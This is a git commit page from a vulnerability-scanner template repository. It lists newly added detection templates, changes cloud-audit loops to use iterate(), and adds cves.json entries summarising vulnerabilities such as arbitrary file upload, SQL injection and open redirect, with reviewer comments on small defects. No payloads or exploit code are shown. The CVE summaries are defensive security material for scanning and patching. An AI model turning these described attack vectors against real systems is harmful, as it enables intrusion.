Merge branch 'projectdiscovery:main' into main
commit
85f9f6814e
|
@ -3,26 +3,65 @@ on:
|
|||
push:
|
||||
paths:
|
||||
- '.new-additions'
|
||||
- 'http/cves/2015/CVE-2015-4455.yaml'
|
||||
- 'http/cves/2019/CVE-2019-7139.yaml'
|
||||
- 'http/cves/2023/CVE-2023-1892.yaml'
|
||||
- 'http/cves/2023/CVE-2023-2227.yaml'
|
||||
- 'http/cves/2023/CVE-2023-27032.yaml'
|
||||
- 'http/cves/2023/CVE-2023-2948.yaml'
|
||||
- 'http/cves/2023/CVE-2023-2949.yaml'
|
||||
- 'http/cves/2023/CVE-2023-31446.yaml'
|
||||
- 'http/cves/2023/CVE-2023-32077.yaml'
|
||||
- 'http/cves/2023/CVE-2023-38964.yaml'
|
||||
- 'http/cves/2023/CVE-2023-43208.yaml'
|
||||
- 'http/cves/2023/CVE-2023-44812.yaml'
|
||||
- 'http/cves/2023/CVE-2023-4521.yaml'
|
||||
- 'http/cves/2023/CVE-2023-45375.yaml'
|
||||
- 'http/cves/2023/CVE-2023-46347.yaml'
|
||||
- 'http/cves/2023/CVE-2023-4973.yaml'
|
||||
- 'http/cves/2023/CVE-2023-5003.yaml'
|
||||
- 'http/cves/2023/CVE-2023-6389.yaml'
|
||||
- 'http/cves/2023/CVE-2023-6989.yaml'
|
||||
- 'http/cves/2024/CVE-2024-0235.yaml'
|
||||
- 'http/cves/2024/CVE-2024-0881.yaml'
|
||||
- 'http/cves/2024/CVE-2024-1183.yaml'
|
||||
- 'http/cves/2024/CVE-2024-22927.yaml'
|
||||
- 'http/cves/2024/CVE-2024-2340.yaml'
|
||||
- 'http/cves/2024/CVE-2024-23917.yaml'
|
||||
- 'http/cves/2024/CVE-2024-24131.yaml'
|
||||
- 'http/cves/2024/CVE-2024-27956.yaml'
|
||||
- 'http/cves/2024/CVE-2024-2876.yaml'
|
||||
- 'http/cves/2024/CVE-2024-3136.yaml'
|
||||
- 'http/cves/2024/CVE-2024-31621.yaml'
|
||||
- 'http/cves/2024/CVE-2024-31849.yaml'
|
||||
- 'http/cves/2024/CVE-2024-31850.yaml'
|
||||
- 'http/cves/2024/CVE-2024-31851.yaml'
|
||||
- 'http/cves/2024/CVE-2024-32399.yaml'
|
||||
- 'http/cves/2024/CVE-2024-32640.yaml'
|
||||
- 'http/cves/2024/CVE-2024-32651.yaml'
|
||||
- 'http/cves/2024/CVE-2024-33575.yaml'
|
||||
- 'http/cves/2024/CVE-2024-33724.yaml'
|
||||
- 'http/cves/2024/CVE-2024-4040.yaml'
|
||||
- 'http/cves/2024/CVE-2024-4348.yaml'
|
||||
- 'http/default-logins/crushftp/crushftp-anonymous-login.yaml'
|
||||
- 'http/default-logins/crushftp/crushftp-default-login.yaml'
|
||||
- 'http/default-logins/soplanning/soplanning-default-login.yaml'
|
||||
- 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml'
|
||||
- 'http/exposed-panels/bonobo-server-panel.yaml'
|
||||
- 'http/exposed-panels/cassia-bluetooth-gateway-panel.yaml'
|
||||
- 'http/exposed-panels/cyberchef-panel.yaml'
|
||||
- 'http/exposed-panels/femtocell-panel.yaml'
|
||||
- 'http/exposed-panels/monitorr-panel.yaml'
|
||||
- 'http/exposed-panels/openwebui-panel.yaml'
|
||||
- 'http/exposed-panels/teamforge-panel.yaml'
|
||||
- 'http/exposed-panels/tixeo-panel.yaml'
|
||||
- 'http/misconfiguration/installer/eyoucms-installer.yaml'
|
||||
- 'http/misconfiguration/installer/sabnzbd-installer.yaml'
|
||||
- 'http/misconfiguration/titannit-web-exposure.yaml'
|
||||
- 'http/vulnerabilities/titan/titannit-web-ssrf.yaml'
|
||||
- 'http/takeovers/squadcast-takeover.yaml'
|
||||
- 'http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml'
|
||||
- 'http/vulnerabilities/titan/titannit-web-rce.yaml'
|
||||
- 'http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml'
|
||||
- 'network/detection/aix-websm-detect.yaml'
|
||||
- 'network/detection/bluecoat-telnet-proxy-detect.yaml'
|
||||
workflow_dispatch:
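Review bot: The path-filter entry `'http/cves/2023/CVE-2023-6389.yaml'` in this list does not match how the same template is indexed in the cves.json section of this commit, where the record carries `"file_path":"http/cves/2023/ CVE-2023-6389.yaml"` with a space after the slash and sits between CVE-2022-4897 and CVE-2023-0099 instead of in ID order. If the template was committed under a name with a leading space, this filter would not fire for it, and consumers that resolve templates through cves.json would look up a path that differs from the one listed here; which of the two is wrong cannot be told from the page. Suggest normalising the file name and regenerating the index so the record reads `"file_path":"http/cves/2023/CVE-2023-6389.yaml"`. A check in the index generator that rejects whitespace in `file_path` would catch the next occurrence.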
|
||||
|
|
|
@ -1,22 +1,61 @@
|
|||
http/cves/2015/CVE-2015-4455.yaml
|
||||
http/cves/2019/CVE-2019-7139.yaml
|
||||
http/cves/2023/CVE-2023-1892.yaml
|
||||
http/cves/2023/CVE-2023-2227.yaml
|
||||
http/cves/2023/CVE-2023-27032.yaml
|
||||
http/cves/2023/CVE-2023-2948.yaml
|
||||
http/cves/2023/CVE-2023-2949.yaml
|
||||
http/cves/2023/CVE-2023-31446.yaml
|
||||
http/cves/2023/CVE-2023-32077.yaml
|
||||
http/cves/2023/CVE-2023-38964.yaml
|
||||
http/cves/2023/CVE-2023-43208.yaml
|
||||
http/cves/2023/CVE-2023-44812.yaml
|
||||
http/cves/2023/CVE-2023-4521.yaml
|
||||
http/cves/2023/CVE-2023-45375.yaml
|
||||
http/cves/2023/CVE-2023-46347.yaml
|
||||
http/cves/2023/CVE-2023-4973.yaml
|
||||
http/cves/2023/CVE-2023-5003.yaml
|
||||
http/cves/2023/CVE-2023-6389.yaml
|
||||
http/cves/2023/CVE-2023-6989.yaml
|
||||
http/cves/2024/CVE-2024-0235.yaml
|
||||
http/cves/2024/CVE-2024-0881.yaml
|
||||
http/cves/2024/CVE-2024-1183.yaml
|
||||
http/cves/2024/CVE-2024-22927.yaml
|
||||
http/cves/2024/CVE-2024-2340.yaml
|
||||
http/cves/2024/CVE-2024-23917.yaml
|
||||
http/cves/2024/CVE-2024-24131.yaml
|
||||
http/cves/2024/CVE-2024-27956.yaml
|
||||
http/cves/2024/CVE-2024-2876.yaml
|
||||
http/cves/2024/CVE-2024-3136.yaml
|
||||
http/cves/2024/CVE-2024-31621.yaml
|
||||
http/cves/2024/CVE-2024-31849.yaml
|
||||
http/cves/2024/CVE-2024-31850.yaml
|
||||
http/cves/2024/CVE-2024-31851.yaml
|
||||
http/cves/2024/CVE-2024-32399.yaml
|
||||
http/cves/2024/CVE-2024-32640.yaml
|
||||
http/cves/2024/CVE-2024-32651.yaml
|
||||
http/cves/2024/CVE-2024-33575.yaml
|
||||
http/cves/2024/CVE-2024-33724.yaml
|
||||
http/cves/2024/CVE-2024-4040.yaml
|
||||
http/cves/2024/CVE-2024-4348.yaml
|
||||
http/default-logins/crushftp/crushftp-anonymous-login.yaml
|
||||
http/default-logins/crushftp/crushftp-default-login.yaml
|
||||
http/default-logins/soplanning/soplanning-default-login.yaml
|
||||
http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml
|
||||
http/exposed-panels/bonobo-server-panel.yaml
|
||||
http/exposed-panels/cassia-bluetooth-gateway-panel.yaml
|
||||
http/exposed-panels/cyberchef-panel.yaml
|
||||
http/exposed-panels/femtocell-panel.yaml
|
||||
http/exposed-panels/monitorr-panel.yaml
|
||||
http/exposed-panels/openwebui-panel.yaml
|
||||
http/exposed-panels/teamforge-panel.yaml
|
||||
http/exposed-panels/tixeo-panel.yaml
|
||||
http/misconfiguration/installer/eyoucms-installer.yaml
|
||||
http/misconfiguration/installer/sabnzbd-installer.yaml
|
||||
http/misconfiguration/titannit-web-exposure.yaml
|
||||
http/vulnerabilities/titan/titannit-web-ssrf.yaml
|
||||
http/takeovers/squadcast-takeover.yaml
|
||||
http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml
|
||||
http/vulnerabilities/titan/titannit-web-rce.yaml
|
||||
http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml
|
||||
network/detection/aix-websm-detect.yaml
|
||||
network/detection/bluecoat-telnet-proxy-detect.yaml
|
||||
|
|
|
@ -18,7 +18,7 @@ variables:
|
|||
|
||||
flow: |
|
||||
code(1)
|
||||
for(let NACLIDs of template.nacls){
|
||||
for(let NACLIDs of iterate(template.nacls)){
|
||||
set("naclid", NACLIDs)
|
||||
code(2)
|
||||
}
|
||||
|
@ -60,4 +60,4 @@ code:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."'
|
||||
# digest: 490a00463044022061fa0f1f88763697856638e53fa1b78a8587487f6f691d28fdd57818ef2ab00a02204919554ac19da3748543fd6a0299c765833719eece0b93ca663319a3b75faba2:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502200de3239f933f1b468292a1ac4504bc398cad18ac3aa6f2de12357bd0e8a65759022100ee901336ec076eb9058f105f779e66be7bac556e1751713419df333cca4eaddf:922c64590222798bb761d5b6d8e72950
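Review bot: Nothing next to the loop in `flow` records what a run with zero iterations means, and the same gap applies to the other seven template sections in this commit (the `template.nacls`, `template.vpcid`, `template.VpcId` and `template.vpnconnactions` loops). Assuming `iterate()` is the nuclei helper that tolerates an empty or single-valued extractor result, a `code(1)` enumeration that returned nothing, for instance because the credentials in use lack the describe permission, produces no finding at all, which reads the same as a compliant account. A YAML comment above `flow:` such as `# iterate() skips the loop when code(1) extracted nothing; no output means "not checked", not "restricted"` would make that explicit for whoever triages the results. The body of `code(1)` lies outside the hunk, so its failure behaviour is inferred rather than seen.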
|
|
@ -18,7 +18,7 @@ variables:
|
|||
|
||||
flow: |
|
||||
code(1)
|
||||
for(let NACLIDs of template.nacls){
|
||||
for(let NACLIDs of iterate(template.nacls)){
|
||||
set("naclid", NACLIDs)
|
||||
code(2)
|
||||
}
|
||||
|
@ -60,4 +60,4 @@ code:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."'
|
||||
# digest: 4a0a00473045022100e86f2a3e5590550fdcae3b2df793550b4ef1c178662d2231cc58bfb4d120c8c6022013a6044df37c3210f35945503f89ceae1bec5494e3d893bc4bddeef18ab5a460:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022021e25dd23124572a8f6dbe6381024f3ecb8f78907d7ba0aafa2eb9c63990e140022100ba7669b283e58bf5b0fd08f3d5501d54221fc7a48b73b088c95330ea4c633f67:922c64590222798bb761d5b6d8e72950
|
|
@ -18,7 +18,7 @@ variables:
|
|||
|
||||
flow: |
|
||||
code(1)
|
||||
for(let VPCIds of template.vpcid){
|
||||
for(let VPCIds of iterate(template.vpcid)){
|
||||
set("vpc", VPCIds)
|
||||
code(2)
|
||||
}
|
||||
|
@ -53,4 +53,4 @@ code:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- 'vpc + " VPC is not using Managed NAT Gateways"'
|
||||
# digest: 4a0a00473045022100c0877797c85620a3b1a36e36908c96c828bcd0dc31d1b46eadfbad0cb57887cb0220322e780cb1d41741e04ff1fa0dfd2d35efe10a367c625bf3dfa3ef63c1297eb8:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100f5f55c1da4e2aaca4b9547bf032c91c95a45a559e294e66e3a04343878e6416c022100919f04f7539cccd971883f2ac51a5a40f17c588dc2bb561902f5397715facf2a:922c64590222798bb761d5b6d8e72950
|
|
@ -18,7 +18,7 @@ variables:
|
|||
|
||||
flow: |
|
||||
code(1)
|
||||
for(let NACLIDs of template.nacls){
|
||||
for(let NACLIDs of iterate(template.nacls)){
|
||||
set("naclid", NACLIDs)
|
||||
code(2)
|
||||
}
|
||||
|
@ -62,4 +62,4 @@ code:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."'
|
||||
# digest: 4b0a00483046022100c7ef9e19cd61d8fcfb7e1d1faf314a723142d80e0796b5101a964a2ece956abe022100c3b4d818fb5d2da95501f4e15d27dab96a8af3b6c26c7e1da86e6a8b98b2c35d:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502204e05c381a073d28047bdf9026597e5d331abca5011bbd8887ac323dd2b2983fb02210097ddd0dd706718f37b2c2f54820e543a9c6549883adc31296235e4b04fe04e97:922c64590222798bb761d5b6d8e72950
|
|
@ -18,7 +18,7 @@ variables:
|
|||
|
||||
flow: |
|
||||
code(1)
|
||||
for(let VpcIds of template.VpcId){
|
||||
for(let VpcIds of iterate(template.VpcId)){
|
||||
set("vpc", VpcIds)
|
||||
code(2)
|
||||
}
|
||||
|
@ -60,4 +60,4 @@ code:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- '"VPC endpoints for " + vpc + "are exposed."'
|
||||
# digest: 4a0a0047304502206fa64b542b8c69a54cd76e83666f0b97b830db5028eb2b684f10388b858f03c7022100a060eff71326c75b63bd7b7caa82a62b376f352503548f36ae7875e06db2b0d1:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450221009cd9ca7d1c7ce5d6db43cc95291be7e509c29f9ed1c7559ee1aeb31a6579920902206e30e36ec371d03d1c5d805d349458ee43fd27bd65917e4f33050e359de8ea3b:922c64590222798bb761d5b6d8e72950
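Review bot: The finding string in the `dsl` extractor, `'"VPC endpoints for " + vpc + "are exposed."'`, has no space before `are`, so the reported text runs the VPC ID straight into the next word (constructed example: `vpc-0abc123are exposed.`). That makes the ID harder to pick out of scan output by eye or by a pattern match in downstream tooling. Suggest `- '"VPC endpoints for " + vpc + " are exposed."'`; the trailing `# digest:` line would presumably need regenerating after the edit. The `code:` block this extractor belongs to starts outside the hunk.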
|
|
@ -18,7 +18,7 @@ variables:
|
|||
|
||||
flow: |
|
||||
code(1)
|
||||
for(let VpcIds of template.VpcId){
|
||||
for(let VpcIds of iterate(template.VpcId)){
|
||||
set("vpc", VpcIds)
|
||||
code(2)
|
||||
}
|
||||
|
@ -53,4 +53,4 @@ code:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- '"VPC Endpoints Not Deployed in the VPC network " + vpc'
|
||||
# digest: 4b0a00483046022100cdf521a3643f23886dee5b78e9910dbd5137467596cffd6cf43641721bdd4c8f022100ada84927f32db8433b532c73902d578b91b0721574bb78b9a37b252df5cd8beb:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220305c7cb9ef27a7249c71a3e30664db9f051b0f5438fe8ce42f2024ea91bfa24e022100e5b9e9b019adf2b1fcfd5121540efdbaf0c5fd39072523eacf41b5a50319666e:922c64590222798bb761d5b6d8e72950
|
|
@ -18,7 +18,7 @@ variables:
|
|||
|
||||
flow: |
|
||||
code(1)
|
||||
for(let VpcIds of template.VpcId){
|
||||
for(let VpcIds of iterate(template.VpcId)){
|
||||
set("vpc", VpcIds)
|
||||
code(2)
|
||||
}
|
||||
|
@ -55,4 +55,4 @@ code:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- '"Flow Logs feature is not enabled for the VPC " + vpc'
|
||||
# digest: 4a0a0047304502201fd60ad86d7fc29391c14ef3ca473cca21f6dac84b73d1a81e87898e6ccb2e73022100dce88d76e827b4874c2672ed572625753817f3fd9642c10a7ab108e2eda2b794:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022016d83c316f318298be2c514542422c1a2f3a42517ac740d4b85ca980c9bf4676022100e7af7b416817f374b418962094ee777893f8fed6b17880fea736d1eb6caa38b2:922c64590222798bb761d5b6d8e72950
|
|
@ -18,7 +18,7 @@ variables:
|
|||
|
||||
flow: |
|
||||
code(1)
|
||||
for(let VpnConnectionIds of template.vpnconnactions){
|
||||
for(let VpnConnectionIds of iterate(template.vpnconnactions)){
|
||||
set("vpnid", VpnConnectionIds)
|
||||
code(2)
|
||||
}
|
||||
|
@ -53,4 +53,4 @@ code:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- 'vpnid + " VPN tunnel is down"'
|
||||
# digest: 4a0a00473045022060f2043ba01e3483298dce863674208b94591615f73b91d4cb47e17eda4ebe310221009cfa4282260a3014b1f77a021f5d8248c4590b61f5e5904685fbcd631e178992:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402205ecec5a00e3d0521ad5a2e9ac0cebbe83e91d206c2233f683dcd750ff5b3841c02205528afb57d459d2c5075638280afcf53459f71aaeb2a5cabc21c41659d91f510:922c64590222798bb761d5b6d8e72950
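Review bot: `template.vpnconnactions` in the loop header misspells "connections"; it presumably mirrors an extractor name defined above the hunk, so both places would have to be renamed together. A correctly spelled `template.vpnconnections` keeps the variable findable when someone searches the cloud templates for VPN connection handling. The loop variable `VpnConnectionIds` holds one ID per pass and would read better as `vpnConnectionId`. Any edit here would presumably also require regenerating the `# digest:` line.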
|
25
cves.json
25
cves.json
|
@ -289,6 +289,7 @@
|
|||
{"ID":"CVE-2015-4074","Info":{"Name":"Joomla! Helpdesk Pro plugin \u003c1.4.0 - Local File Inclusion","Severity":"high","Description":"Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-4074.yaml"}
|
||||
{"ID":"CVE-2015-4127","Info":{"Name":"WordPress Church Admin \u003c0.810 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-4127.yaml"}
|
||||
{"ID":"CVE-2015-4414","Info":{"Name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","Severity":"medium","Description":"WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-4414.yaml"}
|
||||
{"ID":"CVE-2015-4455","Info":{"Name":"WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload","Severity":"critical","Description":"Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-4455.yaml"}
|
||||
{"ID":"CVE-2015-4632","Info":{"Name":"Koha 3.20.1 - Directory Traversal","Severity":"high","Description":"Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-4632.yaml"}
|
||||
{"ID":"CVE-2015-4666","Info":{"Name":"Xceedium Xsuite \u003c=2.4.4.5 - Local File Inclusion","Severity":"medium","Description":"Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-4666.yaml"}
|
||||
{"ID":"CVE-2015-4668","Info":{"Name":"Xsuite \u003c=2.4.4.5 - Open Redirect","Severity":"medium","Description":"Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-4668.yaml"}
|
||||
|
@ -773,6 +774,7 @@
|
|||
{"ID":"CVE-2019-6715","Info":{"Name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","Severity":"high","Description":"WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-6715.yaml"}
|
||||
{"ID":"CVE-2019-6799","Info":{"Name":"phpMyAdmin \u003c4.8.5 - Local File Inclusion","Severity":"medium","Description":"phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls.\n","Classification":{"CVSSScore":"5.9"}},"file_path":"http/cves/2019/CVE-2019-6799.yaml"}
|
||||
{"ID":"CVE-2019-6802","Info":{"Name":"Pypiserver \u003c1.2.5 - Carriage Return Line Feed Injection","Severity":"medium","Description":"Pypiserver through 1.2.5 and below is susceptible to carriage return line feed injection. An attacker can set arbitrary HTTP headers and possibly conduct cross-site scripting attacks via a %0d%0a in a URI.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-6802.yaml"}
|
||||
{"ID":"CVE-2019-7139","Info":{"Name":"Magento - SQL Injection","Severity":"critical","Description":"An unauthenticated user can execute SQL statements that allow arbitrary read access to the underlying database, which causes sensitive data leakage.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7139.yaml"}
|
||||
{"ID":"CVE-2019-7192","Info":{"Name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","Severity":"critical","Description":"This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7192.yaml"}
|
||||
{"ID":"CVE-2019-7219","Info":{"Name":"Zarafa WebApp \u003c=2.0.1.47791 - Cross-Site Scripting","Severity":"medium","Description":"Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-7219.yaml"}
|
||||
{"ID":"CVE-2019-7238","Info":{"Name":"Sonatype Nexus Repository Manager \u003c3.15.0 - Remote Code Execution","Severity":"critical","Description":"Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7238.yaml"}
|
||||
|
@ -1971,6 +1973,7 @@
|
|||
{"ID":"CVE-2022-48165","Info":{"Name":"Wavlink - Improper Access Control","Severity":"high","Description":"Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-48165.yaml"}
|
||||
{"ID":"CVE-2022-48197","Info":{"Name":"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting","Severity":"medium","Description":"Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-48197.yaml"}
|
||||
{"ID":"CVE-2022-4897","Info":{"Name":"WordPress BackupBuddy \u003c8.8.3 - Cross Site Scripting","Severity":"medium","Description":"WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4897.yaml"}
|
||||
{"ID":"CVE-2023-6389","Info":{"Name":"WordPress Toolbar \u003c= 2.2.6 - Open Redirect","Severity":"medium","Description":"The plugin redirects to any URL via the \"wptbto\" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/ CVE-2023-6389.yaml"}
|
||||
{"ID":"CVE-2023-0099","Info":{"Name":"Simple URLs \u003c 115 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0099.yaml"}
|
||||
{"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"}
|
||||
{"ID":"CVE-2023-0159","Info":{"Name":"Extensive VC Addons for WPBakery page builder \u003c 1.9.1 - Unauthenticated RCE","Severity":"high","Description":"The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0159.yaml"}
|
||||
|
@ -2013,6 +2016,7 @@
|
|||
{"ID":"CVE-2023-1835","Info":{"Name":"Ninja Forms \u003c 3.6.22 - Cross-Site Scripting","Severity":"medium","Description":"Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1835.yaml"}
|
||||
{"ID":"CVE-2023-1880","Info":{"Name":"Phpmyfaq v3.1.11 - Cross-Site Scripting","Severity":"medium","Description":"Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1880.yaml"}
|
||||
{"ID":"CVE-2023-1890","Info":{"Name":"Tablesome \u003c 1.0.9 - Cross-Site Scripting","Severity":"medium","Description":"Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1890.yaml"}
|
||||
{"ID":"CVE-2023-1892","Info":{"Name":"Sidekiq \u003c 7.0.8 - Cross-Site Scripting","Severity":"high","Description":"An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2023/CVE-2023-1892.yaml"}
|
||||
{"ID":"CVE-2023-20073","Info":{"Name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","Severity":"critical","Description":"A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20073.yaml"}
|
||||
{"ID":"CVE-2023-2009","Info":{"Name":"Pretty Url \u003c= 1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2009.yaml"}
|
||||
{"ID":"CVE-2023-20198","Info":{"Name":"Cisco IOS XE - Authentication Bypass","Severity":"critical","Description":"Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.\nFor steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.\nCisco will provide updates on the status of this investigation and when a software patch is available.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-20198.yaml"}
|
||||
|
@ -2026,6 +2030,7 @@
|
|||
{"ID":"CVE-2023-2178","Info":{"Name":"Aajoda Testimonials \u003c 2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2178.yaml"}
|
||||
